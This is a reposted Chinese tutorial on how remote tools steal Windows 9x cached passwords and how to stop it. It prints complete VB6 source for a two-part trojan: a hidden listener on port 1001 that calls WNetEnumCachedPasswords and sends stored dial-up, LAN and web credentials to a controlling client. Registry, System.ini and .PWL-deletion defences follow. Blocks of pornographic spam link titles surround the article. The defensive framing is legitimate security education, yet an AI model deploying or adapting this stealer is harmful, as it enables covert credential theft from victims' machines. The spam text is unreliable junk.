亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 學院 > 開發設計 > 正文

防止admin888被遠程盜取的簡易方法

2019-11-18 17:36:01
字體:
來源:轉載
供稿:網友
->打開許多黑客網站的免費下載清單,我們會發現大量遠程攻擊軟件,其中遠程盜取他人密碼便是這些軟件的常見功能之一。“知己知彼”才能“有的放矢”。因此本文在分析遠程盜取密碼的原理后,有針對性地給出對策。->->一、遠程盜取密碼的原理->->我們通過一個示例程序來說明(VB6.0)。->->1.遠程控制端程序(frmClient.frm)->->在窗體上建五個控件:一個名為tcpClient的Winsock控件用于通訊;一個名為txtIP的TextBox控件用于填寫對方的IP地址;一個名為txtOutput的TextBox控件用于顯示盜取的對方電腦的密碼;一個名為cmdConnect的CommandButton控件用于執行連接;一個名為cmdGet_Pass的CommandButton控件用于取回密碼(見圖一)。->->

->->執行時,首先填入對方的IP地址,然后執行連接。若連接成功,則該按鈕變虛,同時“取密碼”按鈕變為可用狀態。圖二顯示了取回密碼后的程序外觀。->->

->->從圖二中可以看出,被盜取回來的密碼主要包括:局域網內某些加鎖硬盤的解鎖碼(信息顯示區的第一行)、互聯網使用中的一些密碼(第二、三行)、撥號上網時使用的用戶名和密碼(第六至九行)等。->->遠程控制端的完整源代碼如下:->->'======================frmClient.frm->->OptionExplicit->->PrivateSubcmdConnect_Click()'執行連接->->tcpClient.RemoteHost=txtIP.Text->->tcpClient.RemotePort=1001->->tcpClient.Connect->->EndSub->->->->PrivateSubcmdGet_Pass_Click()'請求返回密碼->->tcpClient.SendData"Passwords"->->EndSub->->->->PrivateSubtcpClient_DataArrival(ByValbytesTotalAsLong)->->DimstrDataAsString->->tcpClient.GetDatastrData->->IfstrData="ConnectOK"Then->->cmdConnect.Enabled=False'將“連接”按鈕置虛->->cmdGet_Pass.Enabled=True'同時將“取密碼”按鈕置為可用狀態->->Else->->txtOutput.Text=strData'將返回的密碼填入顯示區->->EndIf->->EndSub->->->->2.潛伏在主機端的程序(frmServer.frm)->->窗體上只有兩個控件:一個Winsock控件用于通訊,一個TextBox控件用于密碼暫存。同時,窗體的ShowInTaskbar屬性和Visible屬性均設為False,以便該程序即使在任務欄中也不可見。->->潛伏端程序及其附屬模塊(Passwords.bas)如下:->->'======================frmServer.frm->->OptionExplicit->->->->PrivateSubForm_Load()->->'將LocalPort屬性設置為一個整數。然后調用Listen方法。->->tcpServer.LocalPort=1001->->tcpServer.Listen->->EndSub->->->->PrivateSubtcpServer_ConnectionRequest(ByValrequestIDAsLong)->->'檢查控件的State屬性是否為關閉的。->->'如果不是,在接受新的連接之前先關閉此連接。->->IftcpServer.State<>sckClosedThentcpServer.Close->->'接受具有requestID參數的連接。->->tcpServer.AcceptrequestID->->tcpServer.SendData"ConnectOK"->->EndSub->->->->PrivateSubtcpServer_DataArrival(ByValbytesTotalAsLong)->->'為進入的數據聲明一個變量。然后調用GetData方法。->->DimstrDataAsString->->tcpServer.GetDatastrData->->IfstrData="Passwords"Then->->CallReturn_Password_Cached'調用模塊Passwords.bas中的函數->->tcpServer.SendDatatxtSendData.Text'將TextBox控件中的信息向遠程傳送->->EndIf->->EndSub->->->->'======================Passwords.bas->->OptionExplicit->->DeclareFunctionWNetEnumCachedPasswordsLib"MPR.DLL"_->->(ByVals1AsString,ByVali1AsInteger,ByValb1AsByte,_->->ByValproc_addrAsLong,ByVall1AsLong)AsLong->->->->TypeCached_Passwords->->idAsInteger->->num_of_NameAsInteger'當前資源名的長度->->num_of_PassAsInteger'當前密碼的長度->->flagAsByte->->the_TypeAsByte'類型->->data(1To1024)AsByte'包含當前資源名和密碼的數據區->->EndType->->->->PublicFunctionget_pass(PASSAsCached_Passwords,_->->ByValnouseAsLong)AsInteger->->Dimi,temp1$,temp2$->->Fori=1ToPASS.num_of_Name->->temp1=temp1 Chr(PASS.data(i))'得到當前資源名->->Next->->Fori=PASS.num_of_Name 1To(PASS.num_of_Name PASS.num_of_Pass)->->temp2=temp2 Chr(PASS.data(i))'得到當前密碼->->Next->->'將當前資源名和密碼填入TextBox控件中進行匯總->->frmServer.txtSendData.Text=frmServer.txtSendData.Text Chr(13)_->-> Chr(10) temp1 ":" temp2->->get_pass=True->->EndFunction->->->->PublicSubReturn_Password_Cached()->->Dimi,temp1$,long1AsLong,byte1AsByte->->byte1=&HFF:i=0:long1=0:temp1=""->->'將上面的函數(get_pass)之地址作為參數,調用WNetEnumCachedPasswords->->'WNetEnumCachedPasswords會自動根據資源總數多次調用get_pass函數。->->CallWNetEnumCachedPasswords(temp1,i,byte1,AddressOfget_pass,long1)->->EndSub->->->->可以看出,上述程序的關鍵所在是API函數WNetEnumCachedPasswords的調用,該函數屬于Microsoft的“網絡接口動態鏈接庫”,即“MPR.DLL”(在system目錄下)。WNetEnumCachedPasswords函數的作用是將Windows系統在啟動時緩存在內存中的用戶密碼提取出來并傳給用戶函數。->->因此,正是Windows自身的“密碼緩存”設計,幫助遠程入侵者輕松獲取密碼。->->二、防止密碼被盜取的方法->->關閉“密碼緩存”是解決問題的根本。->->可以用另一個API函數WNetCachePassword來實現。但也有幾個更簡易的方法:->->方法一:修改配置文件->->修改Windows目錄下的System.ini文件,在其[NETWORK]部分中加入一行:->->PasswordCaching=no->->方法二:修改系統注冊表->->首先定位到注冊表的下述位置:->->HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/->->Policies/Network/->->然后新建一個DWORD值:->->DisablePwdCaching=1->->方法三:不登錄系統或不保存密碼->->只有成功登錄系統,Windows的“密碼緩存”功能才會開啟。因此在一般的單用戶情況下,“不登錄系統”不僅是安全的而且在功能上也沒什么損失。如圖三所示,在登錄時選擇“取消”鍵。->->

->->或者干脆從不保存密碼,如圖四所示,將“保存密碼”前的“ˇ”去掉。->->

->->方法四:刪除“.PWL”文件->->“.PWL”文件一般保存在Windows目錄下,它們以加密形式記錄了所有用戶密碼。系統的“密碼緩存”功能正是通過解密“.PWL”文件來實現的。->->非常令人不安的是,一些黑客網站公布了解密“.PWL”文件的算法。因此,即使“密碼緩存”已被關閉,只要入侵者能訪問到硬盤上的“.PWL”文件,用戶密碼依然并不安全。->->所以,刪除“.PWL”文件是一勞永逸的辦法。->->三、提高系統的整體安全性->->從上面的分析和例子我們還可以看出,阻止黑客程序植入本機也是解決問題的關鍵。常用的方法有:不需要IP地址時,清除掉本機的IP設置;加裝針對內部局域網和外部互聯網的防火墻;謹慎打開E-Mail中的附件;謹慎使用不知來源的可執行程序;以及設置主板級開機密碼以防止本機被直接侵入,等等,此處不再贅述。->->


發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
亚洲人成在线播放| 国产欧美 在线欧美| 久久精视频免费在线久久完整在线看| 国产精品日韩欧美大师| 欧美日韩性视频在线| 亚洲精品成人久久电影| 欧美中文字幕视频在线观看| 亚洲精品在线视频| 成人黄色在线观看| 国产ts人妖一区二区三区| 久久久久久久久久久久久久久久久久av| 久久99热精品| 日韩在线视频线视频免费网站| 国产精品三级久久久久久电影| 亚洲视频免费一区| 国产精品一二区| 91免费国产网站| 亚洲福利影片在线| 精品免费在线观看| 欧美国产极速在线| 日韩av影片在线观看| 日韩经典中文字幕| 亚洲视频在线观看| 亚洲国产日韩欧美在线图片| 97在线视频免费| 精品一区二区电影| 欧美精品www在线观看| 亚洲伦理中文字幕| 成人黄色在线播放| 亚洲国产精品悠悠久久琪琪| 欧美极品少妇xxxxⅹ裸体艺术| 精品视频在线播放免| 国产成人在线一区| 久久久亚洲国产天美传媒修理工| 91亚洲午夜在线| 91成人精品网站| 国产成人精品免高潮在线观看| 欧美人交a欧美精品| 国产美女精品视频免费观看| 欧美xxxx14xxxxx性爽| 国产成人免费av电影| 2019中文字幕在线免费观看| 狠狠色噜噜狠狠狠狠97| 亚洲一二三在线| 欧美日韩国产精品一区二区不卡中文| 大伊人狠狠躁夜夜躁av一区| 亚洲人成电影在线| 日韩av在线精品| 91久久久久久国产精品| 亚洲国产精品小视频| 懂色av中文一区二区三区天美| 成人国产精品日本在线| 中日韩午夜理伦电影免费| 欧美www在线| 亚洲成人网在线| 日韩欧美中文字幕在线观看| 日韩毛片在线观看| 精品调教chinesegay| 91精品久久久久久久久久久久久久| 欧美精品videosex极品1| 国产精品视频资源| 国产精品a久久久久久| 日本午夜在线亚洲.国产| 国产一区二区三区视频在线观看| 亚洲一级黄色av| 欧美日韩色婷婷| 亚洲深夜福利网站| 欧美激情一区二区三区成人| 欧美一级淫片videoshd| 亚洲精品免费在线视频| 久久影视电视剧凤归四时歌| 日韩欧美一区视频| 日韩专区在线观看| 国产免费一区二区三区香蕉精| 国语自产精品视频在免费| 丝袜亚洲另类欧美重口| 欧美与黑人午夜性猛交久久久| 欧美极度另类性三渗透| 亚洲成人黄色网| 成人春色激情网| 国产精品久久久久久久久久小说| 一区二区成人精品| 91社区国产高清| 欧美大片免费观看在线观看网站推荐| 欧美激情一区二区三区高清视频| 狠狠操狠狠色综合网| 国产一区二区三区毛片| 国产精品免费一区二区三区都可以| 亚洲欧美日韩国产成人| 中文字幕免费精品一区| 亚洲国产成人91精品| 久久99精品久久久久久噜噜| 亚洲欧美一区二区三区情侣bbw| 欧美高清在线播放| 亚洲人成在线一二| 日韩精品久久久久久福利| 一区二区三区视频免费在线观看| 久久久www成人免费精品| 中文字幕亚洲一区二区三区五十路| 久久久久中文字幕2018| 国产成人综合久久| 日本午夜在线亚洲.国产| 国产精品激情av电影在线观看| 91精品国产色综合久久不卡98口| 亚洲激情中文字幕| 91精品国产99| 在线视频欧美性高潮| 亚州国产精品久久久| 一本色道久久综合狠狠躁篇的优点| 国产99久久久欧美黑人| 欧美性生活大片免费观看网址| 成人黄色大片在线免费观看| 亚洲第一区在线| 国产+成+人+亚洲欧洲| 久久国产精品久久久久| 久久久97精品| 欧美wwwxxxx| 欧美精品videosex牲欧美| 5566成人精品视频免费| 亚洲国产一区自拍| 国产精品高潮粉嫩av| 中文字幕欧美日韩va免费视频| 亚洲最大av在线| 91精品久久久久久久久中文字幕| 久久久国产影院| 亚洲精品国产成人| 日韩av色综合| 久久精品国产成人| 亚洲香蕉av在线一区二区三区| 一区二区av在线| 国产综合久久久久| 日本精品久久久久久久| 91在线观看免费观看| 国产自产女人91一区在线观看| 亚洲最大的网站| 夜夜躁日日躁狠狠久久88av| 亚洲最新av在线| 精品国产自在精品国产浪潮| 精品视频偷偷看在线观看| 热re99久久精品国产66热| 亚洲视频777| 欧美黄色片视频| 国产成人精品网站| 国产一区二区三区三区在线观看| 7777kkkk成人观看| 91久久久久久久久久久| 欧美成人精品一区二区三区| 国产精品黄视频| 中文字幕无线精品亚洲乱码一区| 日韩国产欧美精品在线| 国产亚洲精品激情久久| 欧美有码在线观看视频| 国内精品模特av私拍在线观看| 在线激情影院一区| 成人伊人精品色xxxx视频| 欧美性猛交xxxx偷拍洗澡| 久久久久久亚洲精品不卡| 久久这里有精品视频| 日韩精品小视频| 久久综合电影一区| 亚洲精品大尺度| 日韩电影免费在线观看中文字幕| 高潮白浆女日韩av免费看| 欧美精品www在线观看|